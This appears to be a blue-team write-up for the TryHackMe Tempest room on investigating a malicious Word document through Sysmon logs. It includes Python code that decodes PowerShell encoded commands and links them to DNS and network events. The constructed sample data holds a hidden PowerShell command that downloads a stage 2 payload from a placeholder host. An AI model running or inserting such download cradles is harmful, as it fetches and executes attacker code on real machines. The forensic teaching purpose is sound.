Investigating Microsoft Word C2 Malware Windows Event Logs TEMPEST P2 TryHackMe hack
CTF Security
Tempest TryHackMe room, Tasks 5 & 6
Malicious Document - Stage 2
Based on the initial findings, we discovered that there is a stage 2 execution:
The document successfully executed a base64-encoded command; decoding this string reveals the exact command chain executed by the malicious document.
Malicious Document Traffic
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the domain and IP invoked by the malicious document in the Sysmon logs. Another domain and IP used by the stage 2 payload are logged in the same data source.
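As an added example (not the room's data or the video's own code), the two steps above worked against constructed Sysmon-style records: decode the -EncodedCommand payload (PowerShell expects base64 over UTF-16LE, so decoding it as ASCII shows NUL bytes), then link the decoded command to the DNS queries (Event ID 22) and network connections (Event ID 3) logged for the same ProcessGuid. All GUIDs, domains and IPs are placeholders.

```python
import base64
import re

# Constructed sample: the stage 2 command in clear and in its -EncodedCommand
# form, which PowerShell expects as base64 over UTF-16LE text.
STAGE2_COMMAND = "Invoke-WebRequest -Uri http://stage2.example.invalid/p.txt"
ENCODED_STAGE2 = base64.b64encode(STAGE2_COMMAND.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style records: 1 = process create, 22 = DNS query,
# 3 = network connection. ProcessGuid ties the three together.
SYSMON_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{GUID-1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Desktop\invoice.docx"'},
    {"EventID": 1, "ProcessGuid": "{GUID-2}", "ParentProcessGuid": "{GUID-1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_STAGE2},
    {"EventID": 22, "ProcessGuid": "{GUID-2}", "QueryName": "stage2.example.invalid"},
    {"EventID": 3, "ProcessGuid": "{GUID-2}", "DestinationIp": "203.0.113.10",
     "DestinationPort": 80},
]

# Longest alias first so "-enc" is not consumed as "-e" followed by "nc".
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")


def trace_stage2(events):
    """Map each process that ran an encoded command to the domains it
    resolved and the IPs it connected to, by ProcessGuid."""
    traced = {}
    for ev in events:
        if ev["EventID"] == 1:
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is not None:
                traced[ev["ProcessGuid"]] = {"command": decoded, "domains": [], "ips": []}
    for ev in events:
        entry = traced.get(ev["ProcessGuid"])
        if entry is None:
            continue
        if ev["EventID"] == 22:
            entry["domains"].append(ev["QueryName"])
        elif ev["EventID"] == 3:
            entry["ips"].append(ev["DestinationIp"])
    return traced


if __name__ == "__main__":
    for guid, info in trace_stage2(SYSMON_EVENTS).items():
        print(guid, info)
```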
Tempest https://tryhackme.com/room/tempestincident
Part 1 Video https://youtu.be/O5si_kPROh0
Tools: Timeline Explorer, SysmonView, Wireshark, Brim
#brim #tryhackme #digitalforensic #wireshark #tempest #dfir #blueteam ... https://www.youtube.com/watch?v=S7YdyfRstYw